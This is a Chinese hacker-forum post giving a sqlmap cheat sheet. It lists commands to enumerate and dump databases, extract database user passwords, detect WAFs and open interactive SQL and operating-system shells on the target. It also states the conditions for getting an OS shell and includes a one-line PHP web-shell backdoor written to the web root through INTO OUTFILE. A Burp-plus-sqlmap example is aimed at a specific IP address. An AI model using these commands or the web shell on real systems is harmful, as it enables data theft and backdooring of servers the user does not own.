[工具使用] Sqlmap使用

161 0
Honkers 2025-6-6 03:55:24 来自手机 | 显示全部楼层 |阅读模式

Sqlmap使用

Sqlmap项目下载地址

sqlmap注入方法

sqlmap支持五种不同的注入模式:

Sqlmap常规命令:

  1. sqlmap -u url 指定目标url跑
  2. sqlmap -r head.txt 抓包指定header头信息跑.-r指定文件
  3. 跑数据:
  4. --dbs 跑数据库
  5. -D 指定数据库
  6. --tables 跑表名
  7. -T 指定表名
  8. --columns 跑字段
  9. -C 指定字段
  10. --dump 提取数据
  11. --count 获取表的数量
  12. 参数:
  13. --batch batch:自动选yes。
  14. --banner 查看数据库版本信息
  15. -smart 启发式快速判断,节约时间。
  16. --flush-session 清空session缓存,重新扫描该目标
  17. -z flu 缩写,忘记可短写,删除缓存
  18. --random-agent 随机请求头
  19. --user-agent="某请求头" 指定某请求头
  20. --level x sqlmap扫描等级(1-5)
  21. --threads x 设置测试线程数(1-10),默认线程1,可以自己改大的线程
  22. --risk x (1-3)默认为1会测试大部分语句,2会增加基于事件的测试语句,3会增加or语句的SQL注入测试
  23. sqlmap注入监测:
  24. 共有7个等级,默认为1
  25. 命令: -v 1-7
  26. 0、只显示python错误以及严重的信息。
  27. 1、同时显示基本信息和警告信息。(默认)
  28. 2、同时显示debug信息。
  29. 3、同时显示注入的payload。
  30. 4、同时显示HTTP请求。
  31. 5、同时显示HTTP响应头。
  32. 6、同时显示HTTP响应页面。
  33. 注:如果你想的测试payload最好的等级就是3。
复制代码

Sqlmap命令操作:

  1. 查看数据库相关信息:
  2. --current-user 枚举当前用户
  3. --current-db 枚举当前数据库
  4. --dbs 枚举可用的数据库
  5. --is-dba 枚举数据库权限
  6. --passwords 枚举数据库用户密码
  7. 指纹识别:
  8. -f/--fingerprint 执行检查广泛的DBMS版本指纹
  9. -b/--banner 检测数据库指纹
  10. --hostname 枚举主机名称
  11. Waf识别:
  12. --identify-waf 检测waf信息
  13. 当url有多个参数值时:
  14. -p 参数 #当显示302重定向时可以添加Cookie值进行扫描
  15. 指定Cookie进行扫描:
  16. --cookie="Cookie值" #当需要登录时才可以扫面出漏洞
复制代码

sqlmap -shell命令:

  1. 数据库操作:
  2. --sql-shell #产生一个交互式的sql shell,用来执行sql命令
  3. 执行操作系统命令:
  4. --os-cms=dir #也会生成上传脚本文件和后门文件,执行完后会删除文件。当选完脚本后直接退出sqlmap就会永久存在不会删除
  5. 交互式的系统操作的shell:
  6. --os-shell #产生交互式的操作系统的shell,用来执行cmd命令
  7. --os-shell 系统操作的要求:
  8. (1)网站必须是root权限 #可用--is-dba来确认是否为root权限(当返回True时是管理员权限)
  9. (2)攻击者需要知道网站的绝对路径 #利用报错信息来确认绝对路径
  10. (3)GPC(魔术引号)为off,php主动转义的功能关闭 #php转义再PHP5.3.0废弃并将自PHP5.4.0起移除
  11. (4)secure_file_priv为空 show global variables like '%secure%';
  12. 使用—os-shell之后会生成两个文件
  13. 1.上传脚本文件
  14. 2.后门文件
  15. 写入一句话木马:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "C:\\phpStudy\\WWW\\1.php";
复制代码


sqlmap更新:

  1. git clone https://github.com/sqlmapproject/sqlmap
复制代码

sqlmap支持五种不同的注入模式:

  • 基于布尔的盲注( B):即可以根据返回页面判断条件的真假注入
  • 基于时间的盲注(T):既不能根据页面返回内容判断任何任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断
  • 基于报错注入(E):即页面返回错误信息,或者把注入的语句的结果直接返回页面中
  • 联合查询注入(U):可以使用union的情况下的注入
    堆查询注入(S):可以同时执行多条语句的注入

注意:可以用--technique来指定要使用哪种注入模式,快速扫描
--technique BEUST(可单独或混合指定注入模式进行快速扫描)

Burp+Sqlmap批量测试

Burp+Sqlmap批量测试命令

  1. 扫描多个数据包头:
  2. sqlmap.py -l burp.log --batch --smart 扫描burp生成的log包
  3. --scope="匹配log内容选择扫描(正则)"
  4. 代理监听Sqlmap测试语句:
  5. python sqlmap.py -u "http://59.63.200.79:8804/single.php?id=1" --proxy=http://127.0.0.1:8080 查看历史记录测测试语句
复制代码

Burp生成log流程图:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Honkers

特级红客

关注
  • 3141
    主题
  • 36
    粉丝
  • 0
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行